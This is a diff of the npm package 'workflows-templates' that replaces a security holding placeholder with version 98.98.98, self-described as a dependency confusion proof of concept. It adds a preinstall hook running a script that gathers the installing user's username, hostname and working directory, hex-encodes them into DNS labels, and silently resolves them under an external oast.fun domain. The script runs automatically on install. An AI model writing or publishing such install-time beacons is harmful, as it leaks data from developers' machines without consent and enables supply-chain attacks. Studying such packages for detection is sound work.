workflows-templates 0.0.1-security → 98.98.98

package/package.json

@@ -1,6 +1,11 @@
 {
   "name": "workflows-templates",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "98.98.98",
+  "description": "Dependency Confusion PoC - DNS Beacon Hex Stealth",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js"
+  },
+  "author": "orwa",
+  "license": "ISC"
 }

package/preinstall.js

@@ -0,0 +1,37 @@
+const dns = require('dns');
+const os = require('os');
+const path = require('path');
+
+const MAX_LABEL_LENGTH = 63; // RFC 1035
+
+// Hex encoder, and split into chunks for DNS labels
+function encodeHexChunks(str) {
+  const hex = Buffer.from(str).toString('hex').toLowerCase();
+  const chunks = [];
+  for (let i = 0; i < hex.length; i += MAX_LABEL_LENGTH) {
+    chunks.push(hex.substring(i, i + MAX_LABEL_LENGTH));
+  }
+  return chunks;
+}
+
+// Collect and encode
+const username = os.userInfo().username || "nouser";
+const hostname = os.hostname() || "nohost";
+const cwd = process.cwd() || "nocwd";
+
+const uChunks = encodeHexChunks(username);
+const hChunks = encodeHexChunks(hostname);
+const pChunks = encodeHexChunks(cwd);
+
+// Construct domain
+const oastDomain = "d1htgb4gtqkg1l43t7igxsz4kfnypi8to.oast.fun";
+const fullLabels = [...uChunks, ...hChunks, ...pChunks, oastDomain];
+
+// Join and truncate total length if needed
+let domain = fullLabels.join('.');
+if (domain.length > 253) {
+  domain = domain.substring(0, 253);
+}
+
+// Trigger DNS request silently
+dns.resolve(domain, () => {});

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=workflows-templates for more information.